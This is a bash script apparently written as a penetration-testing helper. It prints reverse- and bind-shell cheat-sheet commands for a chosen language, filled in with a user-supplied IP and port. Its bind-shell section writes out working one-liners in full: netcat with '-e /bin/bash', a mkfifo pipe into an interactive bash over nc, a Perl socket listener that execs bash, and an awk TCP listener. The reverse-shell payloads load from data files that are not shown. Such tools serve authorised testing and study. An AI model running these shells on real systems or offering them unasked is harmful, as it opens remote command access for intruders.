#!/bin/bash
# 
# This script display the reverse Shell Cheat Sheet by kind select by user.
#   - User also can pass the IP and port to make ajust in script output.
#
# This script use the PentestMonkey reverse Shell Cheat Sheet [1] and
# Reverse-shell-one-liners [2].
#
# [1] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# [2] https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
# [3] https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md]
# [4] https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
#
# 
# Changelog:
# 0.1: Initial version. 
# 0.2: Include bind shell options no cheat
#
# Autor: Marcio de Souza Oliveira <marciosouza@debian.org>
#        Leonardo Braga <leobraga96@gmail.com>
# Licensed by GPL-3

set -e

#Global Variables
VERSION='0.2'
USE="Usage: $(basename $0) -i ip:port -l shell-type"
IP=""
PORT=""
LANGUAGE=""

#Default options
DISPLAY_ALL="True"
BIND_SHELL="False"

display_help () {
    echo -e "$USE\n"
    echo "Display reverse shell syntax for supported languages."
    echo
    echo -e "\033[1m OPTIONS \033[m"
    echo "  -h            Display this help"
    echo "  -i IP:PORT    The target IP and port to reverse shell connect"
    echo "  -l shell-type The supported reverse shell kind to display syntax"
    echo "  -b Bind Shell"
    echo "  -v version"    
    echo "                                                                  "
    echo -e "\033[1m Are support the following kinds\033[m" 
    echo -e "\033[1m Reverse:\033[m bash, netcat, java, perl, php, python2, python3, golang, ruby, awk, xterm.\033[m"
    echo -e "\033[1m Bind:\033[m netcat, perl, awk.\033[m"
    echo "                                                                  "       
    echo -e "\033[1m SYNOPSIS \033[m"
    echo 
    echo -e "  $(basename $0) [ -i ip:port ] [ -l shell-type ] [-b Bind Shell]"
    echo -e "  shell-type -l: bash, netcat|nc, java|jar, perl|pl, php, python|py, ruby|rb, golang|go, awk, xterm"
    echo "                                                                  "
}


check_ip () {
        #This function check if received IP is valid
        if [[ "$1" =~ ^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])$ ]]
        then
            export IP="$1"
        else
             echo "[!] Error! The received IP is invalid!"
             echo
             display_help && exit 1
        fi
}

check_port () {
        #This function check if received PORT is valid
        if [[ "$1" -gt 0 ]] && [[ "$1" -le 65535 ]]
        then
            export PORT="$1"
        else
             echo "[!] Error! The received PORT is invalid"
             echo
             display_help && exit 1
        fi
}

display_reverse_shell_cheat () {
    # Receveid the language and display the correct reverse shell syntax
    if [ "$#" != 0 ]
    then
        lang=$(echo "$1" | tr '[:upper:]' '[:lower:]')
        if [ -e "data/reverse/$lang" ]; then
            source "data/reverse/$lang"
        else
            display_help && exit 1
        fi
    else
            display_help && exit 1
    fi
}

display_bind_shell_cheat () {
    # Receveid the language and display the correct reverse shell syntax
    if [ "$#" != 0 ]
    then
        case "$1" in
            netcat|nc)
                echo -e "\033[31m\033[1mBIND SHELL CHEAT: [netcat]\033[m"
                echo -e "\033[31m\033[1mTraditional:\033[m"
                echo -e "\t\033[1mnc -nlvp $PORT -e /bin/bash\033[m"
                echo -e "\033[31m\033[1mNetcat OpenBsd:\033[m"
                echo -e "\t\033[1mrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $PORT >/tmp/f\033[m"
                ;;
            perl|pl)
                echo -e "\033[31m\033[1mBIND SHELL CHEAT: [perl]\033[m"
                echo -e "\t\033[1mperl -e 'use Socket;\$p=$PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));\\
bind(S,sockaddr_in(\$p, INADDR_ANY));listen(S,SOMAXCONN);for(;\$p=accept(C,S);\
close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'\033[m"
                ;;
            AWK|awk)
                echo -e "\033[31m\033[1mBIND SHELL CHEAT: [AWK]\033[m"
                echo -e "\t\033[1mawk 'BEGIN{s=\"/inet/tcp/$PORT/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'\033[m"
                ;;
            xterm)
                echo "xterm"
                ;;
            *)
                display_help && exit 1
                ;;
        esac
    else
            display_help && exit 1
    fi
}


if [ "$#" != 0 ]
then
    while true
    do
        case "$1" in
            -h|--help)
                display_help && exit 0
                ;;
            -v|--version)
                echo "$(basename "$0") version "$VERSION"" && exit 0
                ;;
            -b|--bind)
                export BIND_SHELL="True"
                shift 1
		;;
            -i|--input)
                IFS=':' read IP PORT <<< "$2"
                shift 2
                ;;
            -l|--language)
                LANGUAGE="$2"
                shift 2
                ;;
            -*)
                display_help && exit 1
                ;;
            *)
                if [ "$#" = 0 ]
                then
                    break
                else
                    display_help && exit 3
                fi
                ;;
        esac
    done
else
    display_help && exit 2
fi

# Main execution
if [ "$BIND_SHELL" = "False" ]
then
    check_ip "$IP" && check_port "$PORT"
    display_reverse_shell_cheat "$LANGUAGE"
else
    display_bind_shell_cheat "$LANGUAGE"
fi
